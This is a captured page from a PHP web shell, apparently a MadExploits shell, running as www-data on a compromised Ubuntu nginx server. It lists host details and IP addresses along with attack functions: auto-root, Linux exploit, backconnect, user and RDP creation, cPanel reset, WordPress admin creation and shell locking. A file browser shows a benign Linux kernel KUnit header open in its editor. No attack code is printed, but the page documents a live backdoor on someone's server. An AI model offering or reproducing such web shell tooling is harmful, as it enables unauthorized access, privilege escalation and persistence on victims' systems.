Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-133 /
include /
kunit /
[ HOME SHELL ]
Name
Size
Permission
Action
assert.h
13.37
KB
-rw-r--r--
test-bug.h
694
B
-rw-r--r--
test.h
63.31
KB
-rw-r--r--
try-catch.h
2.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test-bug.h
/* SPDX-License-Identifier: GPL-2.0 */ /* * KUnit API allowing dynamic analysis tools to interact with KUnit tests * * Copyright (C) 2020, Google LLC. * Author: Uriel Guajardo <urielguajardo@google.com> */ #ifndef _KUNIT_TEST_BUG_H #define _KUNIT_TEST_BUG_H #define kunit_fail_current_test(fmt, ...) \ __kunit_fail_current_test(__FILE__, __LINE__, fmt, ##__VA_ARGS__) #if IS_BUILTIN(CONFIG_KUNIT) extern __printf(3, 4) void __kunit_fail_current_test(const char *file, int line, const char *fmt, ...); #else static inline __printf(3, 4) void __kunit_fail_current_test(const char *file, int line, const char *fmt, ...) { } #endif #endif /* _KUNIT_TEST_BUG_H */
Close